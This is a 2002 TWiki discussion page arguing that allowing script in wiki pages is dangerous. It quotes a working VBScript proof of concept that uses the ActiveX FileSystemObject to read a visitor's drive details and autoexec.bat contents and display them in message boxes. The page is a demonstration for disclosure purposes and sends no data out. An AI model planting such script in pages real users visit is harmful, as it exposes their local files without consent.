Tags:
create new tag
, view all tags

If you get a warning about ActiveX, I would suggest you don't allow it to run unless you have read the source and are comfortable with what it does!

This is a sample of what can be done with the FileSystemObject in VisualBasic. AFAIK, it is just as potent in JScript.

The FileSystemObject is a way of manipulating a Windows based file system and the content within it through an ActiveX object. This object can be called / created anywhere that windows script is supported (e.g. in Internet Explorer)

I am posting this as an example of the amount of damage a malicious script can do in support of GetRidOfJavaScript, and TWiki has a big hole in it that allows users to exploit one another in this way

I know a lot of you will be using non ActiveX, or non VisualBasic browsers, but just consider that I can't, and wouldn't want to control all of my users machines. Suggestions of changing to Linux/Mozilla are not well received by large communities which don't already support these systems. Also consider that if I can put this together easily, there will be more determined crackers that might bother to find time to use something more devious. This is just basic "copy and paste from the manual" stuff! The only changes I needed to make were putting it all in lower case (Because VB seems to use a lot of WikiWords) and getting around the VB string concatenator (&) which gets translated into & (as I think all html characters should be!)

There is no malicious intent in this demonstration script, but if someone else edits it, well, can I really be held responsible?

-- RobNorman - 17 Jul 2002

At the time of this edit, the code Rob is talking about is:

<script language="VBScript">
<!--
on error resume next
set objfso = createobject("scripting.filesystemobject")
if err then
    msgbox "Ok, so I couldn't get you, but there's plenty of others!"
else
    dim arrout(4)
    set objdrive = objfso.getdrive("c")
    set objfolder = objfso.getspecialfolder(1)
    arrout(0) = "Your C: drive is in "
    arrout(1) = objdrive.filesystem
    arrout(2) = " format and your system folder is "
    arrout(3) = objfolder.path
    msgbox join(arrout,"")
    set objfolder = objdrive.rootfolder
    for each objfile in objfolder.files
        if lcase(objfile.name) = "autoexec.bat" then
            set objstream = objfso.opentextfile(objfile.path)
            arrout(0) = "The contents of your autoexec file are:"
            arrout(1) = vbnewline
            arrout(2) = vbnewline
            arrout(3) = objstream.readall()
            objstream.close
            msgbox join(arrout,"")
        end if
    next
    arrout(0) = "Your files can be written to as easily as they are read from."
    arrout(1) = vbnewline
    arrout(2) = vbnewline
    arrout(3) = "Hopefully that's enough to convince you that script in a Wiki is a bad idea!"
    msgbox join(arrout,"")
end if
on error goto 0
'-->
</script>

-- MattWilkie - 17 Jul 2002

Edit | Attach | Watch | Print version | History: r2 < r1 | Backlinks | Raw View | Raw edit | More topic actions
Topic revision: r2 - 2002-07-17 - MattWilkie
 
  • Learn about TWiki  
  • Download TWiki
This site is powered by the TWiki collaboration platform Powered by Perl Hosted by OICcam.com Ideas, requests, problems regarding TWiki? Send feedback. Ask community in the support forum.
Copyright © 1999-2017 by the contributing authors. All material on this collaboration platform is the property of the contributing authors.